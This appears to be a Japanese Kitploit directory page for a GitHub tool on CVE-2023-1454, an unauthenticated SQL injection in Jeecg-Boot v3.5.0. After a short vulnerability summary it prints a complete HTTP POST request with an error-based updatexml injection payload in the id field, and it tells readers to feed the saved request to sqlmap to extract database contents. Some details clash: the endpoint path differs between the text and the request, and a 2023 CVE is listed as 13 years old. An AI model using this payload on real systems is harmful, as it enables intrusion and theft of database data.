Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-1454 — CVE-2023-1454脆弱性検出スクリプト | Kitploit
ツール/GitHubGitHub/bugfor-pings/cve-2023-1454
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubbugfor-pings/cve-2023-1454

CVE-2023-1454

CVE-2023-1454脆弱性検出スクリプト

リポジトリを見る
13年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-1454

CVE-2023-1454脆弱性検出スクリプト

この文書は参考用です。無断で記事内の技術資料やツールを使用して、いかなるコンピュータシステムにも侵入行為を行わないでください。 本書に記載された情報を利用して生じた直接的または間接的な結果や損害については、すべて利用者自身が責任を負うものとします。

概要 Jeecg-Bootは、コード生成器ベースのローコード開発プラットフォームです。コード生成器、テンプレートエンジン、権限管理、データディクショナリ、データインポート/エクスポートなどの一連の機能を提供し、開発者がエンタープライズアプリケーションを迅速に構築するのに役立ちます。

脆弱性の概要 エンタープライズWebアプリケーション向けのJavaローコードプラットフォームJeecg-Boot(v3.5.0)は、jimureport-spring-boot-starter-1.5.6.jarを使用しています。Jeecg-Bootは特殊文字のフィルタリングに欠陥があり、フロントエンドがVue3のv3.5.0バージョンにおいて、Jeecgに認証なしのSQLインジェクションが存在します。脆弱性は/querySqlパスが呼び出された際に、idパラメータでSQLが適切に処理されていないことに起因し、これにより直接エラーベースのインジェクションが可能です。認証されていないリモート攻撃者は、特別に細工された文字列を構築することで、最終的にターゲットデータベースの機密情報を取得できます。

影響を受けるバージョン 影響を受けるバージョン:Jeecg-Boot = v3.5.0

パケットをtxtとして保存し、sqlmapを使用してデータを取得できます

root@kitploit:~
POST /jmreport/qurestSql HTTP/1.1
    Host: xxx.xxx.xxx
    Content-Length: 0
    Content-Type: application/json
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    
   {"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

ツールをダウンロード